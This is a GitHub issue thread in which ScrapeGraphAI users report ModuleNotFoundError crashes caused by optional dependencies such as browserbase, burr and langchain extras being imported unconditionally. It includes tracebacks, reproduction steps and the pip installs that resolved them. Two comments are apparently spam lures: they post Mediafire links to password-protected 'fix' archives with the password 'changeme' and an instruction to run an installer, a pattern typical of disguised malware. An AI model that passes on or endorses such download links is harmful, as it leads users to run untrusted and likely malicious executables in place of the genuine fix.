### ISSUE TITLE
ModuleNotFoundError: No module named 'browserbase'

### ISSUE THREAD

**Issue by f-aguzzi** [ScrapeGraphAI/Scrapegraph-ai#594]
I found a bug in the beta.

**Describe the bug**
ScrapeGraph seems to be importing BrowserBase at all times even if it's an optional dependency, causing graphs to fail.

**To Reproduce**
1. `python examples/openai/smart_scraper_openai.py` (or any other example)
2. See error

```
(scrapegraphai) federicoaguzzi@Federicos-MacBook-Air Scrapegraph-ai % python examples/openai/smart_scraper_openai.py
Traceback (most recent call last):
  File "/Volumes/Federico/scrapegraph team/Scrapegraph-ai/examples/openai/smart_scraper_openai.py", line 8, in <module>
    from scrapegraphai.graphs import SmartScraperGraph
  File "/Volumes/Federico/scrapegraph team/Scrapegraph-ai/scrapegraphai/graphs/__init__.py", line 6, in <module>
    from .base_graph import BaseGraph
  File "/Volumes/Federico/scrapegraph team/Scrapegraph-ai/scrapegraphai/graphs/base_graph.py", line 8, in <module>
    from ..integrations import BurrBridge
  File "/Volumes/Federico/scrapegraph team/Scrapegraph-ai/scrapegraphai/integrations/__init__.py", line 6, in <module>
    from .indexify_node import IndexifyNode
  File "/Volumes/Federico/scrapegraph team/Scrapegraph-ai/scrapegraphai/integrations/indexify_node.py", line 8, in <module>
    from ..nodes.base_node import BaseNode
  File "/Volumes/Federico/scrapegraph team/Scrapegraph-ai/scrapegraphai/nodes/__init__.py", line 6, in <module>
    from .fetch_node import FetchNode
  File "/Volumes/Federico/scrapegraph team/Scrapegraph-ai/scrapegraphai/nodes/fetch_node.py", line 12, in <module>
    from ..docloaders import ChromiumLoader
  File "/Volumes/Federico/scrapegraph team/Scrapegraph-ai/scrapegraphai/docloaders/__init__.py", line 4, in <module>
    from .browser_base import browser_base_fetch
  File "/Volumes/Federico/scrapegraph team/Scrapegraph-ai/scrapegraphai/docloaders/browser_base.py", line 5, in <module>
    from browserbase import Browserbase
ModuleNotFoundError: No module named 'browserbase'
```

**Expected behavior**
The graph should execute normally (with PlayWright) unless BrowserBase is chosen explicitly.

**Proposed solution**
Find another way to import BrowserBase, only on command.

**Comment by LorenzoPaleari** [comment]
There are other problems with the initial setup, I'll add them here.

I used the same example file mentioned.

## BURR
**Reproduction steps**
```
pip install scrapegraphai
python3 smart_scraper_openai.py 
```

**Expected behavior**
Burr does not need to be installed if not used. Or make it install with default ScrapeGaphAi

```bash
(venv) lollo@Lorenzos-MacBook-Pro test % python3 smart_scraper_openai.py 
Traceback (most recent call last):
  File "/Users/lollo/Desktop/test/venv/lib/python3.11/site-packages/scrapegraphai/integrations/burr_bridge.py", line 13, in <module>
    import burr
ModuleNotFoundError: No module named 'burr'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/Users/lollo/Desktop/test/smart_scraper_openai.py", line 8, in <module>
    from scrapegraphai.graphs import SmartScraperGraph
  File "/Users/lollo/Desktop/test/venv/lib/python3.11/site-packages/scrapegraphai/graphs/__init__.py", line 6, in <module>
    from .base_graph import BaseGraph
  File "/Users/lollo/Desktop/test/venv/lib/python3.11/site-packages/scrapegraphai/graphs/base_graph.py", line 8, in <module>
    from ..integrations import BurrBridge
  File "/Users/lollo/Desktop/test/venv/lib/python3.11/site-packages/scrapegraphai/integrations/__init__.py", line 5, in <module>
    from .burr_bridge import BurrBridge
  File "/Users/lollo/Desktop/test/venv/lib/python3.11/site-packages/scrapegraphai/integrations/burr_bridge.py", line 15, in <module>
    raise ImportError("burr package is not installed. Please install it with 'pip install scrapegraphai[burr]'")
ImportError: burr package is not installed. Please install it with 'pip install scrapegraphai[burr]'
```

## BrowserBase
Already Mentioned.

I added it here because the tool will give this errors in the exact same order in which they are listed here

**Reproduction steps**
```
pip install scrapegraphai
pip install "scrapegraphai[burr]"
python3 smart_scraper_openai.py 
```


## langchain_anthropic
**Reproduction steps**
```
pip install scrapegraphai
pip install "scrapegraphai[burr]"
pip install "scrapegraphai[more-browser-options]"
python3 smart_scraper_openai.py 
```

**Expected behavior**
`langchain_anthropic` does not need to be installed if not used. Or make it install with default ScrapeGaphAi

**FIX**
To fix this error I had to pip install `scrapegraphai[other-language-models]`. Installing the single package result in needing to install all other packages in `other-language-models` in sequence.

```bash
(venv) lollo@Lorenzos-MacBook-Pro test % python3 smart_scraper_openai.py                  
Traceback (most recent call last):
  File "/Users/lollo/Desktop/test/smart_scraper_openai.py", line 8, in <module>
    from scrapegraphai.graphs import SmartScraperGraph
  File "/Users/lollo/Desktop/test/venv/lib/python3.11/site-packages/scrapegraphai/graphs/__init__.py", line 6, in <module>
    from .base_graph import BaseGraph
  File "/Users/lollo/Desktop/test/venv/lib/python3.11/site-packages/scrapegraphai/graphs/base_graph.py", line 8, in <module>
    from ..integrations import BurrBridge
  File "/Users/lollo/Desktop/test/venv/lib/python3.11/site-packages/scrapegraphai/integrations/__init__.py", line 6, in <module>
    from .indexify_node import IndexifyNode
  File "/Users/lollo/Desktop/test/venv/lib/python3.11/site-packages/scrapegraphai/integrations/indexify_node.py", line 8, in <module>
    from ..nodes.base_node import BaseNode
  File "/Users/lollo/Desktop/test/venv/lib/python3.11/site-packages/scrapegraphai/nodes/__init__.py", line 8, in <module>
    from .generate_answer_node import GenerateAnswerNode
  File "/Users/lollo/Desktop/test/venv/lib/python3.11/site-packages/scrapegraphai/nodes/generate_answer_node.py", line 10, in <module>
    from langchain_anthropic import ChatAnthropic
ModuleNotFoundError: No module named 'langchain_anthropic'
```

## langchain_google_vertexai
**Reproduction steps**
```
pip install scrapegraphai
pip install "scrapegraphai[burr]"
pip install "scrapegraphai[more-browser-options]"
pip install "scrapegraphai[other-language-models]"
python3 smart_scraper_openai.py 
```

**Expected behavior**
`langchain_google_vertexai ` does not need to be installed if not used. Or make it install with default ScrapeGaphAi

```bash
(venv) lollo@Lorenzos-MacBook-Pro test % python3 smart_scraper_openai.py                   
Traceback (most recent call last):
  File "/Users/lollo/Desktop/test/smart_scraper_openai.py", line 8, in <module>
    from scrapegraphai.graphs import SmartScraperGraph
  File "/Users/lollo/Desktop/test/venv/lib/python3.11/site-packages/scrapegraphai/graphs/__init__.py", line 6, in <module>
    from .base_graph import BaseGraph
  File "/Users/lollo/Desktop/test/venv/lib/python3.11/site-packages/scrapegraphai/graphs/base_graph.py", line 8, in <module>
    from ..integrations import BurrBridge
  File "/Users/lollo/Desktop/test/venv/lib/python3.11/site-packages/scrapegraphai/integrations/__init__.py", line 6, in <module>
    from .indexify_node import IndexifyNode
  File "/Users/lollo/Desktop/test/venv/lib/python3.11/site-packages/scrapegraphai/integrations/indexify_node.py", line 8, in <module>
    from ..nodes.base_node import BaseNode
  File "/Users/lollo/Desktop/test/venv/lib/python3.11/site-packages/scrapegraphai/nodes/__init__.py", line 8, in <module>
    from .generate_answer_node import GenerateAnswerNode
  File "/Users/lollo/Desktop/test/venv/lib/python3.11/site-packages/scrapegraphai/nodes/generate_answer_node.py", line 13, in <module>
    from langchain_google_vertexai import ChatVertexAI
ModuleNotFoundError: No module named 'langchain_google_vertexai'
```

## FINAL
After pip installing also `langchain_google_vertexai` the program starts.

**Comment by Taiga-A** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by yldzmuhammed** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by VinciGit00** [comment]
please update to the new beta
